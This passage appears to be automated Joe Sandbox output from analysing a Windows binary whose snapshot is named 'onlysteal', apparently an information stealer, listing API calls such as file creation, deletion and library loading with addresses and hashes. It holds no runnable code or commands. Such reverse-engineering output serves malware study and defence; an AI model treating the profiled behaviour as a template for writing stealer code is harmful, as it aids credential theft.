                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: $
                                      • API String ID: 1269201914-2716087259
                                      • Opcode ID: 52fffd512962b5ad3c104abcfa6479424681b03c72d4344349e2d24241521673
                                      • Instruction ID: 01db35723957d7ec7966efed214bc12b2adda0e41fee21763b394be309b6e273
                                      • Opcode Fuzzy Hash: 52fffd512962b5ad3c104abcfa6479424681b03c72d4344349e2d24241521673
                                      • Instruction Fuzzy Hash: 18A001E62B9142BC3A4C72526D46C3B061EE4CAB61372892EF85BD4491A9907CA519B1
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0024E51F
                                        • Part of subcall function 0024E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0024E8D0
                                        • Part of subcall function 0024E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0024E8E1
                                      Strings
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: ($
                                      • API String ID: 1269201914-451235775
                                      • Opcode ID: 04b388bc270d4d75ed1671a1ca634cbd1de7fd6a9c06899d89d527faabda00dd
                                      • Instruction ID: 1f9b3b679d3ca1a0e623f5cbd68435956c768cbc7ab0ae103ad011d9b391cbae
                                      • Opcode Fuzzy Hash: 04b388bc270d4d75ed1671a1ca634cbd1de7fd6a9c06899d89d527faabda00dd
                                      • Instruction Fuzzy Hash: ADA011C2AB8002BC3E0C3202AC02C3B020EE8C2F203B2882EF80280080A8800CA00832
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0024E51F
                                        • Part of subcall function 0024E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0024E8D0
                                        • Part of subcall function 0024E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0024E8E1
                                      Strings
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: ($
                                      • API String ID: 1269201914-451235775
                                      • Opcode ID: f760c6b715ec9efbc49cafc82ae41b7d55a7c0077b7616d20ecf75b1a797322e
                                      • Instruction ID: 1f9b3b679d3ca1a0e623f5cbd68435956c768cbc7ab0ae103ad011d9b391cbae
                                      • Opcode Fuzzy Hash: f760c6b715ec9efbc49cafc82ae41b7d55a7c0077b7616d20ecf75b1a797322e
                                      • Instruction Fuzzy Hash: ADA011C2AB8002BC3E0C3202AC02C3B020EE8C2F203B2882EF80280080A8800CA00832
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0024E51F
                                        • Part of subcall function 0024E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0024E8D0
                                        • Part of subcall function 0024E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0024E8E1
                                      Strings
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: ($
                                      • API String ID: 1269201914-451235775
                                      • Opcode ID: b36c3596790e8ba8059d5d92c5b183e32c8539e0741ba0a2a9cd87a1065660a7
                                      • Instruction ID: 1f9b3b679d3ca1a0e623f5cbd68435956c768cbc7ab0ae103ad011d9b391cbae
                                      • Opcode Fuzzy Hash: b36c3596790e8ba8059d5d92c5b183e32c8539e0741ba0a2a9cd87a1065660a7
                                      • Instruction Fuzzy Hash: ADA011C2AB8002BC3E0C3202AC02C3B020EE8C2F203B2882EF80280080A8800CA00832
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0024E51F
                                        • Part of subcall function 0024E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0024E8D0
                                        • Part of subcall function 0024E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0024E8E1
                                      Strings
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: ($
                                      • API String ID: 1269201914-451235775
                                      • Opcode ID: 9d7abdb7ad36649dbe607f26fb2269db737de093751854976ab7682b62d762ba
                                      • Instruction ID: 1f9b3b679d3ca1a0e623f5cbd68435956c768cbc7ab0ae103ad011d9b391cbae
                                      • Opcode Fuzzy Hash: 9d7abdb7ad36649dbe607f26fb2269db737de093751854976ab7682b62d762ba
                                      • Instruction Fuzzy Hash: ADA011C2AB8002BC3E0C3202AC02C3B020EE8C2F203B2882EF80280080A8800CA00832
                                      APIs
                                        • Part of subcall function 0025B7BB: GetOEMCP.KERNEL32(00000000,?,?,0025BA44,?), ref: 0025B7E6
                                      • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0025BA89,?,00000000), ref: 0025BC64
                                      • GetCPInfo.KERNEL32(00000000,0025BA89,?,?,?,0025BA89,?,00000000), ref: 0025BC77
                                      Similarity
                                      • API ID: CodeInfoPageValid
                                      • String ID:
                                      • API String ID: 546120528-0
                                      • Opcode ID: d087e665658b0aaf839ccedd291d2b3814bf8f15729bd38ca134bd5448467078
                                      • Instruction ID: 4ebf055c1fe104a0904834851f16e1b7985a7ae98ee9357251eefacaf5cf5fa5
                                      • Opcode Fuzzy Hash: d087e665658b0aaf839ccedd291d2b3814bf8f15729bd38ca134bd5448467078
                                      • Instruction Fuzzy Hash: E45173709202469EDB26CF31C8856BAFBF4EF41302F28446EDC928B251D7759929CB98
                                      APIs
                                      • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00239A50,?,?,00000000,?,?,00238CBC,?), ref: 00239BAB
                                      • GetLastError.KERNEL32(?,00000000,00238411,-00009570,00000000,000007F3), ref: 00239BB6
                                      Similarity
                                      • API ID: ErrorFileLastPointer
                                      • String ID:
                                      • API String ID: 2976181284-0
                                      • Opcode ID: e36255f88bdb410988086ef1a4a5b93b339418f9627b58ba36430403b737b94d
                                      • Instruction ID: f0ac61d01fa4cf23bd6f33c8ca805ff9be2b6916a43b9c2ca380fe5bdf0381dc
                                      • Opcode Fuzzy Hash: e36255f88bdb410988086ef1a4a5b93b339418f9627b58ba36430403b737b94d
                                      • Instruction Fuzzy Hash: EE41C0B16243028FDB24DF19E58456AF7EAFFD6324F148A2DE88183260D7F0ED958B51
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00231E55
                                        • Part of subcall function 00233BBA: __EH_prolog.LIBCMT ref: 00233BBF
                                      • _wcslen.LIBCMT ref: 00231EFD
                                      Similarity
                                      • API ID: H_prolog$_wcslen
                                      • String ID:
                                      • API String ID: 2838827086-0
                                      • Opcode ID: 115df40709ae37743bd43f9554f0957e93424ef26a586cdf72f7a654ae572435
                                      • Instruction ID: 2b4c23400022399a1a9f53a18eed581506a86bbf6da132a74c92ffb464f1563f
                                      • Opcode Fuzzy Hash: 115df40709ae37743bd43f9554f0957e93424ef26a586cdf72f7a654ae572435
                                      • Instruction Fuzzy Hash: 5A3148B1924209AFCF15DF98C945AEEBBF6BF08304F10046AE845A7251CB329E75CF64
                                      APIs
                                      • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,002373BC,?,?,?,00000000), ref: 00239DBC
                                      • SetFileTime.KERNELBASE(?,?,?,?), ref: 00239E70
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: File$BuffersFlushTime
                                      • String ID:
                                      • API String ID: 1392018926-0
                                      • Opcode ID: 8a1414f59be81c11c771b81443aa1b87b9efacd735a543e8f5c90ab7a68e26f5
                                      • Instruction ID: 663b209399d141a6d88117c693087bab999554cd1054200c652838d73cc22dc0
                                      • Opcode Fuzzy Hash: 8a1414f59be81c11c771b81443aa1b87b9efacd735a543e8f5c90ab7a68e26f5
                                      • Instruction Fuzzy Hash: 21210471268346AFC714DF74C892AABBBE4AF56304F08485DF4C583141D3A8D9ACCB61
                                      APIs
                                      • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00239F27,?,?,0023771A), ref: 002396E6
                                      • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00239F27,?,?,0023771A), ref: 00239716
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: 5449d33bc553474926bf95dc6079cdd1faf8f559a7ece4bd9075461cb68fba58
                                      • Instruction ID: 5c4085ba7d5d814c1b392f99d3b0ab952bd51af4e9f4af999650be7263478be7
                                      • Opcode Fuzzy Hash: 5449d33bc553474926bf95dc6079cdd1faf8f559a7ece4bd9075461cb68fba58
                                      • Instruction Fuzzy Hash: D221C4B15103456FE3308E65CC8AFB7B7DCEB4A324F104A19FA95C21D1C7B4A8948E31
                                      APIs
                                      • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00239EC7
                                      • GetLastError.KERNEL32 ref: 00239ED4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: ErrorFileLastPointer
                                      • String ID:
                                      • API String ID: 2976181284-0
                                      • Opcode ID: 2fcb6dab7b69cc6efe34515b5bc98a112fd92a1d7d4ae3a605ce83e882d4f3ba
                                      • Instruction ID: 28c9a3f70aea8fd8e0067a52256d9158aeeef56a89f808b117346b0ae6f5a230
                                      • Opcode Fuzzy Hash: 2fcb6dab7b69cc6efe34515b5bc98a112fd92a1d7d4ae3a605ce83e882d4f3ba
                                      • Instruction Fuzzy Hash: C7110CB1620705ABD734CA28CC45BA6B7ECAF46370F50462AE553D26D0D7F0EDA9C760
                                      APIs
                                      • _free.LIBCMT ref: 00258E75
                                        • Part of subcall function 00258E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0025CA2C,00000000,?,00256CBE,?,00000008,?,002591E0,?,?,?), ref: 00258E38
                                      • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00271098,002317CE,?,?,00000007,?,?,?,002313D6,?,00000000), ref: 00258EB1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: Heap$AllocAllocate_free
                                      • String ID:
                                      • API String ID: 2447670028-0
                                      • Opcode ID: 7a5566c7f837d646d2e55c7b17ad62d29ab9e3091c605488563a4899fa1f9419
                                      • Instruction ID: 01cfb0c86ced7c8e3d3e98226133dc959d0a351f60d8e85b54fc70a5f03f2025
                                      • Opcode Fuzzy Hash: 7a5566c7f837d646d2e55c7b17ad62d29ab9e3091c605488563a4899fa1f9419
                                      • Instruction Fuzzy Hash: 51F06832631116A6DB216E256C06B6F37789F81B73F144116FD18B6191DFF0DD2889AC
                                      APIs
                                      • GetCurrentProcess.KERNEL32(?,?), ref: 002410AB
                                      • GetProcessAffinityMask.KERNEL32(00000000), ref: 002410B2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: Process$AffinityCurrentMask
                                      • String ID:
                                      • API String ID: 1231390398-0
                                      • Opcode ID: 43ec0cb22af6fc48a0a1734a29ed00936f9d91dcdf9cdc02961438a959f4cfec
                                      • Instruction ID: 8369ad699f9d5fe793b52518d607d54005589e83eb80f278ecca3973eaf5c873
                                      • Opcode Fuzzy Hash: 43ec0cb22af6fc48a0a1734a29ed00936f9d91dcdf9cdc02961438a959f4cfec
                                      • Instruction Fuzzy Hash: ECE0D872F20146E7CF0DCBB49C099EB73DDEB442043109175E803D3101F970DE994660
                                      APIs
                                      • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0023A325,?,?,?,0023A175,?,00000001,00000000,?,?), ref: 0023A501
                                        • Part of subcall function 0023BB03: _wcslen.LIBCMT ref: 0023BB27
                                      • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0023A325,?,?,?,0023A175,?,00000001,00000000,?,?), ref: 0023A532
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: AttributesFile$_wcslen
                                      • String ID:
                                      • API String ID: 2673547680-0
                                      • Opcode ID: b76d2d8adced1a8158df387413c470f15d2870993a599a8b982cfe43f1b11dfc
                                      • Instruction ID: 6f819e4f46a138f5ed0325012666d49976c270c84d888020db0b54f4ef909f07
                                      • Opcode Fuzzy Hash: b76d2d8adced1a8158df387413c470f15d2870993a599a8b982cfe43f1b11dfc
                                      • Instruction Fuzzy Hash: B8F0307226011A7BDF015F60DC45FDA376DBB04385F448061B945D5160DB71DAA8DB50
                                      APIs
                                      • DeleteFileW.KERNELBASE(000000FF,?,?,0023977F,?,?,002395CF,?,?,?,?,?,00262641,000000FF), ref: 0023A1F1
                                        • Part of subcall function 0023BB03: _wcslen.LIBCMT ref: 0023BB27
                                      • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0023977F,?,?,002395CF,?,?,?,?,?,00262641), ref: 0023A21F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: DeleteFile$_wcslen
                                      • String ID:
                                      • API String ID: 2643169976-0
                                      • Opcode ID: 8469cb6ed491ecc2b2c15870f6060d400be97e94f125a9f300843fac5ebeb0cf
                                      • Instruction ID: a2858e44e65bad01d85528bb0044330ff4c441e25672db51a9b8d886f74e73cd
                                      • Opcode Fuzzy Hash: 8469cb6ed491ecc2b2c15870f6060d400be97e94f125a9f300843fac5ebeb0cf
                                      • Instruction Fuzzy Hash: 47E092711602196BEB019F60EC85FEA375CBB08385F484021BD44D2050EB61DEA8DA60
                                      APIs
                                      • GdiplusShutdown.GDIPLUS(?,?,?,?,00262641,000000FF), ref: 0024ACB0
                                      • CoUninitialize.COMBASE(?,?,?,?,00262641,000000FF), ref: 0024ACB5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: GdiplusShutdownUninitialize
                                      • String ID:
                                      • API String ID: 3856339756-0
                                      • Opcode ID: 7da4031ecdb6b4e2c99d6de2690333943a4d02aa25f7bfc08b0ec886890d042b
                                      • Instruction ID: 4fff32548c823414831af8d52f75113cb71a65eeb900423b6dddcbee1f672a9c
                                      • Opcode Fuzzy Hash: 7da4031ecdb6b4e2c99d6de2690333943a4d02aa25f7bfc08b0ec886890d042b
                                      • Instruction Fuzzy Hash: 00E06572544650EFCB00DB58EC0AB45FBACFB48B20F004266F416D3760CB746C50CA90
                                      APIs
                                      • GetFileAttributesW.KERNELBASE(?,?,?,0023A23A,?,0023755C,?,?,?,?), ref: 0023A254
                                        • Part of subcall function 0023BB03: _wcslen.LIBCMT ref: 0023BB27
                                      • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0023A23A,?,0023755C,?,?,?,?), ref: 0023A280
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: AttributesFile$_wcslen
                                      • String ID:
                                      • API String ID: 2673547680-0
                                      • Opcode ID: a931ee7417ba04d4c8271124f9cbb54e3dac337c614b3c95e182b8e739652d98
                                      • Instruction ID: 3df2fd5f0c75361dc59eb8e682e080ac0c9419ea55e5dc8ab830a9a5fcb13eff
                                      • Opcode Fuzzy Hash: a931ee7417ba04d4c8271124f9cbb54e3dac337c614b3c95e182b8e739652d98
                                      • Instruction Fuzzy Hash: 07E092729101245BCB11EF64DC09BD9B75CAB083E1F044271FE84E3190D770DE54CAA0
                                      APIs
                                      • _swprintf.LIBCMT ref: 0024DEEC
                                        • Part of subcall function 00234092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002340A5
                                      • SetDlgItemTextW.USER32(00000065,?), ref: 0024DF03
                                        • Part of subcall function 0024B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0024B579
                                        • Part of subcall function 0024B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0024B58A
                                        • Part of subcall function 0024B568: IsDialogMessageW.USER32(00010438,?), ref: 0024B59E
                                        • Part of subcall function 0024B568: TranslateMessage.USER32(?), ref: 0024B5AC
                                        • Part of subcall function 0024B568: DispatchMessageW.USER32(?), ref: 0024B5B6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                      • String ID:
                                      • API String ID: 2718869927-0
                                      • Opcode ID: 9f82cab54105c32e2a87ead5a1f7f2f99b2bb7587052d36a8feda1c023a99a82
                                      • Instruction ID: d49a56051f5f95e64676695e459056712f02b5fbc31e1af9b41f6ec499eb6b4f
                                      • Opcode Fuzzy Hash: 9f82cab54105c32e2a87ead5a1f7f2f99b2bb7587052d36a8feda1c023a99a82
                                      • Instruction Fuzzy Hash: 8DE092B651025826DF02AB60EC0EF9E3BAC5B05785F440852B208DA0B2DA78EA608F61
                                      APIs
                                      • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00240836
                                      • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0023F2D8,Crypt32.dll,00000000,0023F35C,?,?,0023F33E,?,?,?), ref: 00240858
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: DirectoryLibraryLoadSystem
                                      • String ID:
                                      • API String ID: 1175261203-0
                                      • Opcode ID: 31aa459f8e0df8ee6e1abd9b2430bc3a0a64aed4094cd6a321906c009a3213ad
                                      • Instruction ID: b4ba480f3188fc401499648c6adb55ba6e39881e9540d6b2d552a7914416ed17
                                      • Opcode Fuzzy Hash: 31aa459f8e0df8ee6e1abd9b2430bc3a0a64aed4094cd6a321906c009a3213ad
                                      • Instruction Fuzzy Hash: BAE012764101686ADB11AB94EC49FDA77ACAF09391F044065B645D2005DAB4DA948BA0
                                      APIs
                                      • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0024A3DA
                                      • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 0024A3E1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: BitmapCreateFromGdipStream
                                      • String ID:
                                      • API String ID: 1918208029-0
                                      • Opcode ID: 815be5c9c29450170ff3e440ad9ffc2ad14f6ec2fb809347e022d4052d514581
                                      • Instruction ID: 161a508754476d51b058820d81e9df38f06828e808fc7b8a0d1558814cf23dd1
                                      • Opcode Fuzzy Hash: 815be5c9c29450170ff3e440ad9ffc2ad14f6ec2fb809347e022d4052d514581
                                      • Instruction Fuzzy Hash: 7BE06D71920208EBDB14DF45C40069ABBE8FB04364F10805AA88693200E3B0AE10DB91
                                      APIs
                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00252BAA
                                      • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00252BB5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                      • String ID:
                                      • API String ID: 1660781231-0
                                      • Opcode ID: 35452f6632b9daf497019f322bd9b95abf7ac3f801f75c7f229610eaa5b0db6d
                                      • Instruction ID: 5c3a86628826e029e98f0e4e09ecf6c7226299c0d07ce8716abcd807aca1dcfb
                                      • Opcode Fuzzy Hash: 35452f6632b9daf497019f322bd9b95abf7ac3f801f75c7f229610eaa5b0db6d
                                      • Instruction Fuzzy Hash: 28D0A93A174202E94C14AE7028066583355AF53BBB7E0628AEC20854C1EF70807CA81E
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
